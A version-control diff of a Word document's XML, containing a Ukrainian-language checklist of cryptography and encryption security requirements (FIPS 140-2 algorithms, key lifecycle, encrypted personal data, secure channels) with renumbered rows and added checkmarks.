           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">7: </w:t>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -20130,6 +21701,8 @@
         </w:rPr>
         <w:t>Вимоги до криптографії та шифування</w:t>
       </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -20479,7 +22052,27 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> і випадкові рядки генеруються з використанням криптографічних модулів схваленого генератор</w:t>
+              <w:t xml:space="preserve"> і випадкові рядки генеруються з використанням кр</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">иптографічних модулів </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> генератор</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -20561,6 +22154,44 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -20591,11 +22222,21 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="553" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>5.2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -20623,9 +22264,157 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+                <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся, що криптографічні алгоритми, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t xml:space="preserve">використовувані додатком були перевірені </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>зг</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ідно до</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>FIPS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>140-2 або екві</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>валентного</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> стандарту.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="F79646" w:themeFill="accent6"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -20672,7 +22461,7 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>5.2</w:t>
+              <w:t>5.3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -20706,7 +22495,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
             <w:r>
@@ -20715,37 +22504,17 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся, що криптографічні алгоритми, використовувані додатком були перевірені </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>зг</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>ідно до</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переконайтеся в тому, що криптографічні модулі працюють</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
@@ -20755,19 +22524,29 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>FIPS</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>140-2 або еквівалентного стандарту.</w:t>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>відповідно до опублікованої</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> політики </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>безпеки.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -20801,7 +22580,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -20809,6 +22588,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -20836,7 +22616,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -20844,6 +22624,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -20871,9 +22652,19 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -20919,7 +22710,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5.3</w:t>
+              <w:t>5.4</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -20953,7 +22744,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+                <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
             <w:r>
@@ -20964,47 +22755,141 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся в тому, що криптографічні модулі працюють</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              <w:t>Переко</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">найтеся, що існує явна політика </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>того, як криптографічні ключі управляються (наприклад, згенерован</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>і</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, розподілені, анульовані). </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>відповідно до опублікованої</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> політики </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>безпеки.</w:t>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>тому</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, що життєвий цикл</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ключів</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> дотримува</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>єтться</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> належним чином.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -21038,7 +22923,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+                <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -21046,6 +22931,44 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="540" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="9BBB59" w:themeFill="accent3"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="553" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:sym w:font="Wingdings" w:char="F0FC"/>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="738" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -21076,11 +22999,21 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="553" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>5.5</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7110" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -21111,13 +23044,41 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="738" w:type="dxa"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Персональні дані повинні зберігаються в зашифрованому вигляді. </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>П</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ереконайтеся, що зв'язок йде через захищені канали.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="630" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -21148,21 +23109,49 @@
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>5.4</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="7110" w:type="dxa"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="540" w:type="dxa"/>
